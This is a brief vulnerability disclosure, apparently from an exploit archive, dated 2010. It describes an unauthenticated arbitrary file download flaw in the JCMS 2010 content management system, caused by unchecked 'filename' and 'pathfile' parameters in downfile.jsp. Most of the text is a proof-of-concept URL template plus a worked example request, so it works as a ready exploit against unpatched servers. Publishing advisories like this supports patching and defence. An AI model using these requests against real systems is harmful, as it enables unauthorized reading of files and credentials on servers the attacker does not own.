##################################################################################################### #Title: JCMS 2010 File Download Vulnerability #Date: 2010-11-22 #Author: Beach #Team: http://www.linux520.com/ #Vendor: http://www.hanweb.com/ #Language:Java #Greetz: Brother ##################################################################################################### [*]Description: In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input So this vulnerability allows an attacker to download any files . ##################################################################################################### [*]POC: http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name] ##################################################################################################### [*]I.E: http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp #####################################################################################################